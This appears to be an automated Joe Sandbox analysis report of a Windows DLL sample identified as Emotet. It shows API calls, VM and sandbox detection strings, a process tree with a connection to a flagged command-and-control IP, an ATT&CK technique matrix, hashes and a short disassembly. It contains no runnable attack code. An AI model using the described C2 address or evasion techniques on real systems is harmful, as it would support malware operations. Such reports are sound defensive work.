Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose, 6_2_000000018000D26C
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node graph_2-10064
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: svchost.exe, 0000001C.00000002.744179874.0000023FCC32D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: svchost.exe, 0000001C.00000002.744179874.0000023FCC32D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 35 44 6e 75 85 11 47-bd a2 bb ed 21 43 9f 89VMware7,1
Source: svchost.exe, 0000001C.00000002.744179874.0000023FCC32D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware7,1
Source: svchost.exe, 0000001C.00000002.744179874.0000023FCC32D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: regsvr32.exe, 00000006.00000003.428890553.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.428918999.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.743734401.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.597712126.000001F4AF8E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.597577635.000001F4AF8AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.743745789.0000023FCBA5D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.743863470.0000023FCBAC3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000B.00000002.743473344.0000026495002000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 0000001C.00000002.744179874.0000023FCC32D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIES1371
Source: svchost.exe, 0000001C.00000002.744179874.0000023FCC32D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Virtual RAM
Source: regsvr32.exe, 00000006.00000002.743677609.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.428821113.0000000000D92000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWPz
Source: svchost.exe, 0000001C.00000002.744179874.0000023FCC32D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware-42 35 44 6e 75 85 11 47-bd a2 bb ed 21 43 9f 89
Source: svchost.exe, 0000001C.00000002.744179874.0000023FCC32D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: svchost.exe, 0000001C.00000002.744179874.0000023FCC32D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021
Source: svchost.exe, 0000001C.00000002.744313864.0000023FCCA54000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware7,1Ld?
Source: svchost.exe, 0000000B.00000002.743545213.0000026495028000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 0000001C.00000002.743845132.0000023FCBAB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWsx
Source: C:\Windows\System32\regsvr32.exe Code function: 2_2_00007FF8CA9B20E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00007FF8CA9B20E0
Source: C:\Windows\System32\regsvr32.exe Code function: 2_2_00007FF8CA9B7BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno, 2_2_00007FF8CA9B7BE8
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\loaddll64.exe Process queried: DebugPort
Source: C:\Windows\System32\regsvr32.exe Code function: 2_2_00007FF8CA9BD318 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00007FF8CA9BD318
Source: C:\Windows\System32\regsvr32.exe Code function: 2_2_00007FF8CA9B20E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00007FF8CA9B20E0
Source: C:\Windows\System32\regsvr32.exe Code function: 2_2_00007FF8CA9B6550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00007FF8CA9B6550

                      HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\regsvr32.exe Network Connect: 23.239.0.12 443
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\x4ByCNJqst.dll",#1
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA, 2_2_00007FF8CA9BDF98
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoA, 2_2_00007FF8CA9BC39C
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesA, 2_2_00007FF8CA9BC7F4
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 2_2_00007FF8CA9BDF20
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW, 2_2_00007FF8CA9BDF3C
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesA, 2_2_00007FF8CA9BC8C8
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesA, 2_2_00007FF8CA9BC834
Source: C:\Windows\System32\regsvr32.exe Code function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 2_2_00007FF8CA9BC450
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoA, 2_2_00007FF8CA9BE1E8
Source: C:\Windows\System32\regsvr32.exe Code function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s, 2_2_00007FF8CA9BC934
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 2_2_00007FF8CA9BC16C
Source: C:\Windows\System32\regsvr32.exe Code function: _getptd,GetLocaleInfoA, 2_2_00007FF8CA9BC2B4
Source: C:\Windows\System32\regsvr32.exe Code function: _getptd,GetLocaleInfoA, 2_2_00007FF8CA9BC6E4
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\regsvr32.exe Code function: 2_2_00007FF8CA9B4558 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 2_2_00007FF8CA9B4558
Source: C:\Windows\System32\regsvr32.exe Code function: 2_2_00007FF8CA9BE6C0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 2_2_00007FF8CA9BE6C0
Source: svchost.exe, 0000001C.00000002.744269389.0000023FCC3ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe
Source: svchost.exe, 0000001C.00000002.744269389.0000023FCC3ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe

                      Stealing of Sensitive Information

Source: Yara match File source: 2.2.regsvr32.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.17092640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.f20000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.regsvr32.exe.680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.1a5a5ea0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.17092640000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.1a5a5ea0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.f20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.356219703.0000017092640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.358233793.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.356042845.000001A5A5EA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.743858456.0000000000F20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (the number in front of a technique is the signature count shown in the report for that cell):

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 2 Native API | 1 DLL Side-Loading | 111 Process Injection | 2 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 13 Virtualization/Sandbox Evasion | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 2 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 111 Process Injection | Security Account Manager | 141 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Hidden Files and Directories | NTDS | 13 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Regsvr32 | Cached Domain Credentials | 1 Remote System Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Rundll32 | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 34 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 File Deletion | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
Behavior Graph (ID: 626484, Sample: x4ByCNJqst.dll, Start date: 14/05/2022, Architecture: WINDOWS, Score: 80)

Signatures on the sample: Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Yara detected Emotet

Process tree with the signatures attached to each node:
  loaddll64.exe (started)
    regsvr32.exe (started): Hides that the sample has been downloaded from the Internet (zone.identifier)
      regsvr32.exe (started): connects to 23.239.0.12 port 443 from local port 49789 (LINODE-AP Linode LLC, US, United States); System process connects to network (likely due to code injection or exploit)
    cmd.exe (started)
      rundll32.exe (started): Hides that the sample has been downloaded from the Internet (zone.identifier)
    rundll32.exe (started)
    rundll32.exe (started)
  svchost.exe (started): Query firmware table information (likely to detect VMs)
  svchost.exe (started)
  4 other processes

Source | Detection | Scanner | Label
x4ByCNJqst.dll | 38% | Virustotal | 
No Antivirus matches
Source | Detection | Scanner | Label
2.2.regsvr32.exe.680000.0.unpack | 100% | Avira | HEUR/AGEN.1215493
3.2.rundll32.exe.17092640000.0.unpack | 100% | Avira | HEUR/AGEN.1215493
4.2.rundll32.exe.1a5a5ea0000.1.unpack | 100% | Avira | HEUR/AGEN.1215493
6.2.regsvr32.exe.f20000.1.unpack | 100% | Avira | HEUR/AGEN.1215493
No Antivirus matches
Source | Detection | Scanner | Label
https://23.239.0.12/_ | 100% | Avira URL Cloud | malware
https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
http://crl.ver) | 0% | Avira URL Cloud | safe
https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
https://23.239.0.12/ | 0% | URL Reputation | safe
http://help.disneyplus.com. | 0% | URL Reputation | safe
https://www.pango.co/privacy | 0% | URL Reputation | safe
https://disneyplus.com/legal. | 0% | URL Reputation | safe
                      No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
https://23.239.0.12/ | true | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://23.239.0.12/_ | regsvr32.exe, 00000006.00000003.428908993.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.428869428.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.743719059.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.428821113.0000000000D92000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://www.disneyplus.com/legal/your-california-privacy-rights | svchost.exe, 00000010.00000003.585822779.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585922922.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585841484.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.ver) | svchost.exe, 00000010.00000002.597712126.000001F4AF8E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.743897114.0000023FCBADD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
https://www.disneyplus.com/legal/privacy-policy | svchost.exe, 00000010.00000003.585822779.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585922922.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585841484.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://help.disneyplus.com. | svchost.exe, 00000010.00000003.585822779.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585922922.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585841484.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.hotspotshield.com/ | svchost.exe, 00000010.00000003.584551631.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584742502.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584455774.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584636899.000001F4B061A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584466682.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584705944.000001F4B0602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584669781.000001F4B061A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.hotspotshield.com/terms/ | svchost.exe, 00000010.00000003.584551631.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584742502.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584455774.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584636899.000001F4B061A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584466682.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584705944.000001F4B0602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584669781.000001F4B061A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.pango.co/privacy | svchost.exe, 00000010.00000003.584551631.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584742502.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584455774.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584636899.000001F4B061A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584466682.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584705944.000001F4B0602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584669781.000001F4B061A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://disneyplus.com/legal. | svchost.exe, 00000010.00000003.585822779.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585922922.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585841484.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
23.239.0.12 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 626484
Start date and time: 14/05/2022 04:44:14 (2022-05-14 04:44:14 +02:00)
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 39s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: x4ByCNJqst.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Run with higher sleep bypass
Number of analysed new started processes: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal80.troj.evad.winDLL@19/0@0/1
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 49
• Number of non-executed functions: 215
Cookbook Comments:
• Found application associated with file extension: .dll
• Adjust boot time
• Enable AMSI
• Sleeps bigger than 120000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, UsoClient.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 20.223.24.244, 51.104.136.2
• Excluded domains from analysis (whitelisted): client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, settings-prod-neu-2.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, www.msftconnecttest.com, img-prod-cms-rt-microsoft-com.akamaized.net, atm-settingsfe-prod-geo.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
                          No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
23.239.0.12 | Xp7X1Yf3CM.dll | Get hash | malicious | Browse |
 | RuqTBW6t32.dll | Get hash | malicious | Browse |
 | yj81rxDZIp.dll | Get hash | malicious | Browse |
 | x4ByCNJqst.dll | Get hash | malicious | Browse |
 | lc4KFeS296.dll | Get hash | malicious | Browse |
 | 36yjawe0S4.dll | Get hash | malicious | Browse |
 | Ns2al4764F.dll | Get hash | malicious | Browse |
 | cX9TLU9gnx.dll | Get hash | malicious | Browse |
 | 56vvRzZVQI.dll | Get hash | malicious | Browse |
 | 8PnsJpuSdb.dll | Get hash | malicious | Browse |
 | yaEOuyT3Sg.dll | Get hash | malicious | Browse |
 | bsST3VDo8G.dll | Get hash | malicious | Browse |
 | wdxJNuEzAd.dll | Get hash | malicious | Browse |
 | yaEOuyT3Sg.dll | Get hash | malicious | Browse |
 | bsST3VDo8G.dll | Get hash | malicious | Browse |
 | 6ez8Bx2x6f.dll | Get hash | malicious | Browse |
 | 2Bgxulf6QF.dll | Get hash | malicious | Browse |
 | sEfyaa5VPQ.dll | Get hash | malicious | Browse |
 | 40Gbs8Qkm6.dll | Get hash | malicious | Browse |
 | wdxJNuEzAd.dll | Get hash | malicious | Browse |
                                                                  No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
LINODE-APLinodeLLCUS | Xp7X1Yf3CM.dll | Get hash | malicious | Browse | 23.239.0.12
 | RuqTBW6t32.dll | Get hash | malicious | Browse | 23.239.0.12
 | yj81rxDZIp.dll | Get hash | malicious | Browse | 23.239.0.12
 | x4ByCNJqst.dll | Get hash | malicious | Browse | 23.239.0.12
 | lc4KFeS296.dll | Get hash | malicious | Browse | 23.239.0.12
 | 36yjawe0S4.dll | Get hash | malicious | Browse | 23.239.0.12
 | Ns2al4764F.dll | Get hash | malicious | Browse | 23.239.0.12
 | cX9TLU9gnx.dll | Get hash | malicious | Browse | 23.239.0.12
 | 56vvRzZVQI.dll | Get hash | malicious | Browse | 23.239.0.12
 | 8PnsJpuSdb.dll | Get hash | malicious | Browse | 23.239.0.12
 | yaEOuyT3Sg.dll | Get hash | malicious | Browse | 23.239.0.12
 | bsST3VDo8G.dll | Get hash | malicious | Browse | 23.239.0.12
 | wdxJNuEzAd.dll | Get hash | malicious | Browse | 23.239.0.12
 | yaEOuyT3Sg.dll | Get hash | malicious | Browse | 23.239.0.12
 | bsST3VDo8G.dll | Get hash | malicious | Browse | 23.239.0.12
 | 6ez8Bx2x6f.dll | Get hash | malicious | Browse | 23.239.0.12
 | 2Bgxulf6QF.dll | Get hash | malicious | Browse | 23.239.0.12
 | sEfyaa5VPQ.dll | Get hash | malicious | Browse | 23.239.0.12
 | 40Gbs8Qkm6.dll | Get hash | malicious | Browse | 23.239.0.12
 | wdxJNuEzAd.dll | Get hash | malicious | Browse | 23.239.0.12
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
51c64c77e60f3980eea90869b68c58a8 | Xp7X1Yf3CM.dll | Get hash | malicious | Browse | 23.239.0.12
 | RuqTBW6t32.dll | Get hash | malicious | Browse | 23.239.0.12
 | yj81rxDZIp.dll | Get hash | malicious | Browse | 23.239.0.12
 | x4ByCNJqst.dll | Get hash | malicious | Browse | 23.239.0.12
 | lc4KFeS296.dll | Get hash | malicious | Browse | 23.239.0.12
 | 36yjawe0S4.dll | Get hash | malicious | Browse | 23.239.0.12
 | Ns2al4764F.dll | Get hash | malicious | Browse | 23.239.0.12
 | cX9TLU9gnx.dll | Get hash | malicious | Browse | 23.239.0.12
 | 56vvRzZVQI.dll | Get hash | malicious | Browse | 23.239.0.12
 | 8PnsJpuSdb.dll | Get hash | malicious | Browse | 23.239.0.12
 | yaEOuyT3Sg.dll | Get hash | malicious | Browse | 23.239.0.12
 | bsST3VDo8G.dll | Get hash | malicious | Browse | 23.239.0.12
 | wdxJNuEzAd.dll | Get hash | malicious | Browse | 23.239.0.12
 | yaEOuyT3Sg.dll | Get hash | malicious | Browse | 23.239.0.12
 | bsST3VDo8G.dll | Get hash | malicious | Browse | 23.239.0.12
 | 6ez8Bx2x6f.dll | Get hash | malicious | Browse | 23.239.0.12
 | 2Bgxulf6QF.dll | Get hash | malicious | Browse | 23.239.0.12
 | sEfyaa5VPQ.dll | Get hash | malicious | Browse | 23.239.0.12
 | 40Gbs8Qkm6.dll | Get hash | malicious | Browse | 23.239.0.12
 | wdxJNuEzAd.dll | Get hash | malicious | Browse | 23.239.0.12
                                                                  No context
                                                                  No created / dropped files found
                                                                  File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Entropy (8bit):6.482091984293291
                                                                  TrID:
                                                                  • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                  • Win64 Executable (generic) (12005/4) 10.17%
                                                                  • Generic Win/DOS Executable (2004/3) 1.70%
                                                                  • DOS Executable Generic (2002/1) 1.70%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                  File name:x4ByCNJqst.dll
                                                                  File size:545280
                                                                  MD5:8978c658ba95819f72866e0ffc41fa81
                                                                  SHA1:f8eed4cba5ff946b074a9b2f95e2fb92c0427651
                                                                  SHA256:50363092e6becfe6ad91c4118fcb2e9207ebb6d2016de3459d56b41fbc3b61c1
                                                                  SHA512:0b093d2867d42ea43caa0e59cd5d6913a3552eec6ea13eb0fa9bb1a67dcf5841fb481d4090d9fe71f216dabd350909679df891423ed15df3a346221d7842f90d
                                                                  SSDEEP:12288:B4UJY9B+TenWsSEPHjMOUP9uXdt7JpfYNVr9RM54RutCTdJGqIoTCZ4eEsZIHxHy:B4UJY9BSenZSEPHjMOUP9Udt7JpfYNVg
                                                                  TLSH:41C4CFA5435C08FCE762C3395C975BC5B1F7BDAE0664AF260BC18DA05E1BA90F53A381
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.H.v.&.v.&.v.&.h...o.&.h...2.&.h.....&.Q6].s.&.v.'.9.&.h...w.&.h...w.&.h...w.&.h...w.&.Richv.&.........PE..d.....}b.........."
                                                                  Icon Hash:74f0e4ecccdce0e4
                                                                  Entrypoint:0x1800423a8
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x180000000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x627D8598 [Thu May 12 22:09:28 2022 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:2
                                                                  File Version Major:5
                                                                  File Version Minor:2
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:2
                                                                  Import Hash:b268dbaa2e6eb6acd16e04d482356598
                                                                  Instruction
                                                                  dec eax
                                                                  mov dword ptr [esp+08h], ebx
                                                                  dec eax
                                                                  mov dword ptr [esp+10h], esi
                                                                  push edi
                                                                  dec eax
                                                                  sub esp, 20h
                                                                  dec ecx
                                                                  mov edi, eax
                                                                  mov ebx, edx
                                                                  dec eax
                                                                  mov esi, ecx
                                                                  cmp edx, 01h
                                                                  jne 00007F9804DBEEE7h
                                                                  call 00007F9804DC1074h
                                                                  dec esp
                                                                  mov eax, edi
                                                                  mov edx, ebx
                                                                  dec eax
                                                                  mov ecx, esi
                                                                  dec eax
                                                                  mov ebx, dword ptr [esp+30h]
                                                                  dec eax
                                                                  mov esi, dword ptr [esp+38h]
                                                                  dec eax
                                                                  add esp, 20h
                                                                  pop edi
                                                                  jmp 00007F9804DBED90h
                                                                  int3
